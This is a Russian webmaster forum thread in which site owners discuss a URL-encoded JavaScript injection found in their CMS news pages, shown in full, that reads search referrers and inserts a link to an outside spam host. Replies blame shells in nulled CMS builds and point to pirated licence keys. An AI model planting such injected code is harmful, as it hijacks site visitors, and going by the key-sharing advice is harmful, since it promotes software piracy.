StimulProfit.com - 6

olegv63
На сайте с 21.12.2007
Offline
24
#841
JA1DD:
Блин, уже второй или третий раз в полных новостях нахожу вот такой код:
<script type="text/javascript">document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3E%0A%0Afunction%20getrandom%28min_random%2C%20max_random%29%20%7B%0A%20%20%20%20var%20range%20%3D%20max_random%20-%20min_random%20+%201%3B%0A%20%20%20%20return%20Math.floor%28Math.random%28%29*range%29%20+%20min_random%3B%0A%7D%0A%0ABCB%20%3D%20%7B%7D%3B%0ABCB.r_tds%20%3D%20false%3B%0ABCB.f_tds%20%3D%20false%3B%0ABCB.a_s%20%3D%20false%3B%0ABCB.ses%20%3D%20%5B%0A%09%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%0A%5D%3B%0ABCB.BCB%20%3D%20function%28ref%29%20%7B%0A%09var%20q%3Dnull%3B%0A%0A%09for%28var%20i%3D0%3B%20i%3CBCB.ses.length%3B%20i++%29%20%7B%0A%09%09var%20se%20%3D%20BCB.ses%5Bi%5D%3B%0A%09%09if%20%28ref.match%28se%5B0%5D%29%29%20%7B%0A%09%09%09q%20%3D%20ref.match%28se%5B1%5D%29%3B%0A%09%09%09if%20%28q%29%20q%20%3D%20q%5Bse%5B2%5D%5D%3B%0A%09%09%09break%3B%0A%09%09%7D%0A%09%7D%0A%0Avar%20referer%3D%22Y%22%3B%0Aif%20%28referer%3D%3D%22N%22%29%20%7B%0Aq%3Ddocument.title%3B%0A%0A%7D%0A%0A%09if%20%28q%29%20%7B%0A%0A%09%09q%3Ddocument.title%3B%0A%0A%0A%0Avar%20c_url%3D%27http%3A//rapidasshared.ce.ms/%3Fwkey%3D68905%26query%3D%27+%28encodeURIComponent%28q%29%29%3B%0A%0Adocument.write%28%27%3Cstyle%3E.module-one-search%20img%20%7Bdisplay%3Ablock%3B%7D.module-one-search%20%7Bheight%3A112px%3Bmargin%3A6px%3Bfont%3Abold%2016px%20Arial%3Bbackground%3A%23fefefe%20url%28http%3A//img291.imageshack.us/img291/3307/blbg.gif%29%20repeat-y%20100%25%200%3Bborder%3A1px%20solid%20%23fefefe%3Bborder%3A1px%20solid%20%23ccc%3B%7D.module-one-search%20a%20%7Bcolor%3A%23007ecb%3B%7D.module-one-search%20span%20%7Bdisplay%3Ablock%3Bcolor%3A%23464646%3Bfont%3A12px%20Arial%3Btext-transform%3Auppercase%3B%7D.module-one-search%20.module-bg%20%7Bheight%3A72px%3Bpadding%3A40px%20100px%200%20131px%3Bbackground%3Aurl%28http%3A//img19.imageshack.us/img19/9311/blbgl.gif%29%20no-repeat%2014px%2016px%3B%7D%3C/style%3E%3Cdiv%20class%3D%22module-one-search%22%3E%3Cdiv%20class%3D%22module-bg%22%3E%3Ca%20href%3D%22%27+c_url+%27%22%20target%3D%22_blank%22%3E%3Cb%3E%27+q+%27%3C/b%3E%3C/a%3E%20прямая%20ссылка%3C/div%3E%3C/div%3E%27%29%3B//e%0A%09%7D%0A%7D%3B%0ABCB.BCB%28document.referrer%29%3B%0A%3C/script%3E"));</script>


Что делать не знаю, может поможете?

Тоже мучался с этой хренью, чистел, на следующий день опять зараза, ставил заплатки с офсайта, не помогло

Я так понял что движок не лицуха а нуллед с паблика, в этом вся причина, в код воткнули shell

Вылечил это так: скачал с офсайта лицензионную версию и нашел в инете ключ к движку, всё отлично работает, зараза больше не проникает

[Удален]
#842

olegv63, оттуда же нельзя качать без лицензии?

sibius777
На сайте с 15.05.2008
Offline
94
#843
Reise:
sibius777, у меня ваша новая ПП даже не открывается.

Ну, она не моя. Сам с ней только сегодня начал работать - пока-что тестирую.

С Admitad 1.042.000 рублей в сутки - не предел (https://www.admitad.com/ru/promo/?ref=5246305278)
olegv63
На сайте с 21.12.2007
Offline
24
#844
seregavip:
olegv63, оттуда же нельзя качать без лицензии?

А ну это другое..... У меня на один домен есть лицуха, поэтому для меня небыло проблем

Там где я брал ключи там можно и скачать сам движок 9.2, лучше поискать чем каждый день чистить базу и менять пароли..

V
На сайте с 14.09.2010
Offline
18
#845
olegv63:
А ну это другое..... У меня на один домен есть лицуха, поэтому для меня небыло проблем
Там где я брал ключи там можно и скачать сам движок 9.2, лучше поискать чем каждый день чистить базу и менять пароли..

Если стоит 8.3нул , пойдет шаблон на 9.2 лицензию? Скинте пожалуйста ссылку где можно ключь взять на лицензию

W
На сайте с 16.05.2010
Offline
48
#846
VIctoricus:
Если стоит 8.3нул , пойдет шаблон на 9.2 лицензию? Скинте пожалуйста ссылку где можно ключь взять на лицензию

Вот сайт вводишь домен и копируешь в config

V
На сайте с 14.09.2010
Offline
18
#847
webdvizhok:
Вот сайт вводишь домен и копируешь в config

Спасибо, ну а про версию встанет шаблон с 8.3 на 9.2? На оф сайте не вижу 8.3

[Удален]
#848
А ну это другое..... У меня на один домен есть лицуха, поэтому для меня небыло проблем
Там где я брал ключи там можно и скачать сам движок 9.2, лучше поискать чем каждый день чистить базу и менять пароли..

Можете выложить хэш оригинального дистрибутива, или отправить в личку?

V
На сайте с 14.09.2010
Offline
18
#849

Есть проблемма, взломали сайт (появился левый админ) и прописал свой ID от стимула. Удалив его ид сохранил, но при заходе в админку его ид опять прописывается. Как это выличить?

[Удален]
#850
VIctoricus:
Есть проблемма, взломали сайт (появился левый админ) и прописал свой ID от стимула. Удалив его ид сохранил, но при заходе в админку его ид опять прописывается. Как это выличить?

Удалить шелл.

сменить название файла админки.

сменить пароли фтп и myqsl.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий